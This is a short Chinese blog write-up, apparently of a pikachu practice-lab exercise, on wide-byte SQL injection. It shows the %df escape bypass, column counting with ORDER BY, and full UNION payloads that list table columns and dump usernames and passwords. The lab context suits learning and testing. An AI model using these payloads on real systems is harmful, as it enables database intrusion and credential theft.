宽字节注入

删去27,那是前端对‘%’进行url编码得来的;

还是不行,因为0 and 0当然就假了,

想起来要用or了:正常回显欧了,接下来和联合注入一样了

看这个

ORDER BY

查看左边列数多少

1🆗

2🆗

3不🆗

两位确定,

注库名

pikchua

注表名

注(user)表里的字段

kobe%df' or 1=1 union all select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1#

注值

kobe%df' or 1=1 union all select 1,(select group_concat(username,password) from users)#

总结:

只要网站的开发人员,使用到的转义函数添加的过滤字符经过url编码以后,能够被转化成2位16进制的编码,就可以利用宽字节注入实现一个攻击;

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值